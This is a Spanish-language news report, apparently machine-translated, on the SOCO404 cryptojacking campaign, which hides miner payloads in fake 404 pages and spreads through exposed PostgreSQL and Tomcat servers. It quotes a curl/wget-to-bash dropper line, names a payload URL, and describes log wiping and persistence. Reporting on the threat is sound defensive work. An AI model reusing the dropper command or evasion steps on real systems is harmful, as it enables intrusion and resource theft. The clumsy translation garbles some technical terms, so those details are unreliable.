Una nueva ola de ataques de criptojacking es explotar la humilde página de error 404 para esconder binarios maliciosos por defensores pasados “SOCO404”, la campaña incrusta las cargas útiles de Base64 dentro de las cargas de errores aparentemente inocentes alojadas en los sitios de Google y los servidores comprometidos de Tomcat, luego los detonan en los dos anfitriones de Linux y Windows.
Debido a que el contenido malicioso está escondido entre las etiquetas HTML normales, el filtrado de URL tradicional y los escáneres estáticos a menudo pierden la amenaza hasta que los ciclos de la CPU desaparecen misteriosamente.
La operación surgió por primera vez a mediados de 2025, pero los investigadores creen que es una evolución de los bots mineros anteriores que se aprovecharon de las credenciales débiles de Tomcat e instancias de confluencia de Atlassian sin parpadear.
Investigadores de Wiz.io identificado La última variante mientras se monitorea la actividad de shell anómalo que emana de bases de datos PostgreSQL expuestas públicamente, un servicio que casi un tercio de los inquilinos en la nube deja abierto a Internet.
Una vez dentro, los atacantes arman la copia de PostgreSQL de la función del programa para ejecutar comandos arbitrarios, girando lateralmente a través de propiedades mixtas-OS y girando a los mineros frescos a escala.
Más allá de las bases de datos mal configuradas, el adversario abusa de los servidores web ya propiedad para disfrazarse de infraestructura confiable. Los sitios de transporte coreanos comprometidos entregan goteros de Linux (SOCO.SH) y cargadores de Windows (OK.exe) que inmediatamente se borran para obstaculizar los forenses.
Cada rama de la familia de malware se disfraza de procesos legítimos: SD-PAM, KWorker/R-RCU_P, o servicios de Windows de ocho caracteres aleatorios) mientras programan trabajos de Cron y ganchos de inicio de inhalación o el registro de eventos de Windows para persistir no detectados.
Los paneles corporativos registran nada más que un aumento gradual en las facturas de energía y una caída en el rendimiento.
Infección a través de 404 páginas con modificación HTML
El corazón de la cadena de entrega de Soco404 es un cargador que obtiene una página de error falso de https://www.fastsoco.top/1.
Flujo de ataque (fuente – Wiz.io)
Oculto entre los marcadores personalizados exe101 y exe101 se encuentra una blob base64 que el cargador decodifica directamente en la memoria, evitando escáneres basados en disco.
En Linux, el comando inicial se asemeja a la línea de un solo enlace:-
sh -c “(curl http: //: 8080/SOCO.SH || wget -q -o- http: //: 8080/SOCO.SH) | BASH”
El script genera un nombre de archivo aleatorio, mata a los mineros competidores, toallitas/var/log/wtmp y, si se ejecuta como raíz, permite a grandespages y ajustes registros específicos del modelo para ryzen o cpus Intel para exprimir cada hash del silicio.
Un trozo de GO-Lang luego se vuelve a ejecutar como CPUHP/1, llama al hogar del anfitrión 404 y lanza a un trabajador XMRIG contra Pools C3pool y Moneroocean usando Wallet 8BMVXB … Eyz.
Los hosts de Windows siguen una ruta paralela: certutil, invoke-webRequest o curl cae ok.exe en c: \ users \ public \, genera conhost.exe, inyecta el minero principal y elimina silenciosamente el archivo original después de un retraso de la elección de tres segundos.
Ambas ramas hablan sobre los enchufes locales para la resiliencia y mantienen los hilos de vigilancia listos para reaparecer si se matan, asegurando que la página de error falso siga cosechando monedas mucho después de que el mensaje 404 se desvanezca desde la vista.
Experimenta una detección de phishing más rápida y precisa y una protección mejorada para su negocio con análisis de sandbox en tiempo real-> Prueba cualquiera.
